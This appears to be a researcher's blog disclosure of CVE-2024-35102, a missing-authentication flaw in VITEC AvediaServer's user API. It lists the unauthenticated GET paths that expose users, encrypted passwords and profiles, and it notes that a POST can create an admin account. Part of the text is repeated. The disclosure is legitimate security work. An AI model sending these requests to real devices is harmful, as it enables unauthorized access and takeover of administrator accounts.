AvediaServer Unauthorised API Access Vulnerability
Two weeks ago I discovered a security vulnerability in AvediaServer, details of which you can see below.
VITEC (formerly Exterity) AvediaServer uses API to list, create and delete users.
On the other hand, as you can see, they forgot to implement any authentication to this API.
So, if you send the following GET requests to AvediaServer, you can see all users, individual user details with encrypted password (if the user is local) and profiles (admin, asset manager, etc.).
Platform details where I found this vulnerability.
AvediaServer
Product : avsrv-m8105
Platform : mavsrv-c1520
Version : 8.6.2-1
http://hostname/api/auth/users
http://hostname/api/auth/users/1
http://hostname/api/auth/profiles
You can also create a user with administrative access if you send a POST request using the following parameters.
I also used Shodan and Google Dorking and found several devices open to the internet. I found asset owners based on IP address records and I informed them.
Additionally, VITEC also confirmed this vulnerability after a long wait.
MITRE has assigned CVE-2024-35102 to this vulnerability.
https://www.cve.org/CVERecord?id=CVE-2024-35102
Cumhur KIZILARI (aka Zeus)
Platform details where I found this vulnerability.
AvediaServer
Product : avsrv-m8105
Platform : mavsrv-c1520
Version : 8.6.2-1
http://hostname/api/auth/users
You can also create a user with administrative access if you send a POST request using the following parameters.
Additionally, VITEC also confirmed this vulnerability after a long wait.
https://www.cve.org/CVERecord?id=CVE-2024-35102
Cumhur KIZILARI (aka Zeus)
Comments
Post a Comment